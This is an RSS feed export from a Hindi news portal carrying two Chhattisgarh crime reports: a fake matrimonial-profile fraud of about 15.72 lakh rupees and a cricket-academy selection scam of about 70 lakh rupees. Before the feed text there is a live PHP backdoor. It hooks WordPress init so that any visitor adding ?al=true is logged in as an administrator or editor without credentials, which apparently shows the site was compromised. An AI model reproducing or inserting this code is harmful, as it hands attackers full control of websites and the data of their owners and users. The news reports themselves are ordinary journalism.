// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); woman cheated – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 16 Dec 2024 13:45:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-राजनांदगांव में फेक प्रोफाइल बनाकर युवती से ठगी, एक विदेशी आरोपी को गिरफ्तार https://pratyushaashakinayikiran.com/?p=110464 Mon, 16 Dec 2024 13:45:00 +0000 https://pratyushaashakinayikiran.com/?p=110464 राजनांदगांव।

राजनांदगांव में फेक प्रोफाइल बनाकर युवती से 15 लाख 72 हजार की ऑनलाइन ठगी के मामले में डोंगरगांव थाना पुलिस और साइबर सेल की टीम ने बड़ी कार्रवाई की है,पुलिस ने एक विदेशी नाइजेरियन आरोपी को गिरफ्तार किया है,आरोपी का वीजा और पासपोर्ट की वैधता समाप्त होने के बाद भी दिल्ली में अवैधानिक रूप से आरोपी रह रहा था और अपनी महिला मित्र के साथ मिलकर इस तरीके की फेक प्रोफाइल बनाकर ठगी की घटना को अंजाम दिया गया था,पुलिस ने प्रेस वार्ता कर मामले का खुलासा किया है।

राजनांदगांव जिले के डोंगरगांव थाना क्षेत्र अंतर्गत प्रार्थियां ने पुलिस में रिपोर्ट दर्ज कराई की shaadi.com की फेक प्रोफाइल बनाकर उसे 15 लाख 72 हजार रूपये की ऑनलाइन ठगी की गई है और आरोपी ने आलोक देशपांडे के नाम से फेक प्रोफाइल बनाई थी और यूनाइटेड किंगडम में कार्यरत होना बताया था और जल्द भारत लौटकर प्रार्थियां से शादी कर घर बसाने की बात कही गई थी,जिसके बाद जुलाई 2024 में एक अनजान महिला ने पीड़िता को फोन कर बताया कि आलोक देशपांडे भारत में दिल्ली एयरपोर्ट में विदेशी मुद्रा के साथ आए हुए हैं उस मुद्रा को भारतीय मुद्रा में एक्सचेंज करने की प्रक्रिया के तहत फीस जमा करनी होगी उस दौरान आरोपी ने प्रार्थियां को कॉल कर बोला पैसों की अर्जेंट जरूरत है,जिसके बाद अलग-अलग तरीकों से बैंक खातों के माध्यम से कई किस्त में 15 लाख 72 हजार रुपए प्राप्त किया और ठगी कर डलवा लिए गए और आरोपियों द्वारा मोबाइल बंद कर दिया गया,जिसके बाद पूरे मामले की रिपोर्ट पुलिस में लिखाई गई,पुलिस ने पूरे मामले में एक आरोपी को गिरफ्तार किया है,आरोपी द्वारा अलग-अलग बैंक खातों से यह पैसे डलवाए गए थे,नाइजेरिया का रहने वाला आरोपी जॉनसन सैमुअल उम्र 40 साल ने पूरे घटनाक्रम को अंजाम दिया,दिल्ली में आरोपी रहता था,इसके साथ ही उसकी एक महिला मित्र ने उसकी मदद की महिला आरोपी फरार है जिसकी तलाश पुलिस द्वारा की जा रही है,आरोपी के पास से ठगी में उपयोग किए गए एक लैपटॉप,4 नग एंड्राइड मोबाइल और पासपोर्ट जप्त किया गया है और पूरे मामले की जांच की जा रही है।
शातिर आना तरीके से फेक प्रोफाइल बनाकर एक विदेशी नाइजेरियन आरोपी ने पूरे घटनाक्रम को अंजाम दिया और महिला को ठगी का शिकार बनाया,इसमें उसके साथ एक अन्य महिला ने पूरी घटना को अंजाम देने में मदद की फिलहाल आरोपी को गिरफ्तार कर लिया गया है,आरोपी का वीजा और पासपोर्ट की वैधता भी समाप्त हो गई है,दिल्ली में वह अवैधानिक रूप से रह रहा था पुलिस पूरे मामले में जांच कर रही है और अन्य तार भी खागले जा रहे हैं जिसमें अन्य मामले के खुलासे भी हो सकते हैं।

]]>
छत्तीसगढ़-बिलासपुर में महिला ने 70 लाख रूपये ठगे, क्रिकेट टीम में सेलेक्शन का दिया झांसा https://pratyushaashakinayikiran.com/?p=77528 Mon, 30 Sep 2024 14:55:00 +0000 https://pratyushaashakinayikiran.com/?p=77528 बिलासपुर.

बिलासपुर के तोरवा पुलिस ने राष्ट्रीय स्तर पर क्रिकेट टीम में सलेक्शन कराने के नाम पर ठगी करने वाली वाली फरार महिला आरोपी को गिरफ्तार किया है महिला बच्चों के अभिभावकों से करीब 70 लाख रुपए ठगे लिये थे, मामले में पूर्व दो आरोपी गिरफ्तार हो चुके है। फिलहाल पुलिस महिला को गिरफ्तार कर न्यायालय मे पेश किया है।

दरअसल 10.01.23 को वेयर हाउस रोड महामाया विहार मे रहने वाली प्रार्थिया राखी खन्ना ने सिविल लाइन थाने पहुंचकर रिपोर्ट दर्ज कराई थी कि उसके बेटे आकाश खन्ना ने दिसंबर 2021 प्राइम क्रिकेट अकादमी बंगाली काली मंदिर ग्राउंड तोरवा में ज्वाइन किया था जिसका कोच सन्नी दुआ था डायरेक्टर अंजुल दुआ और उसका पति सन्नी दुआ के द्वारा बच्चों  को नेशनल लेवल पर क्रिकेट टीम में सलेक्शन दिलाने के सुनहरे सपने दिखाकर बच्चों और अभिभावकों से  नगदी रकम व आरोपिया खुशबू सिंह के अकाउंट में ऑनलाइन ट्रांजैक्शन से करीब 70 लाख रुपए हासिल कर धोखाधड़ी किया गया था। पुलिस मामले की रिपोर्ट पर अपराध पंजीबद कर आरोपी सन्नी दुआ और अंजुल दुआ को गिरफ्तार किया था। तो वही खुशबू सिंह प्रकरण में फरार थी जिसकी पुलिस तलाश कर रही थी।इसी बीच तोरवा पुलिस को सूचना मिली कि खुशबू सिंह को जरहाभाटा चौक के आसपास देखा गया है। सूचना के बाद पुलिस मौके पर पहुंचकर आरोपिया खुशबू सिंह को हिरासत में लिया जिससे पूछताछ करने पर अपना जुर्म स्वीकार किया इसपर आरोपिया के अकाउंट को सीज किया गया है आरोपिया को गिरफ्तार कर न्यायालय में पेश किया गया है।

]]>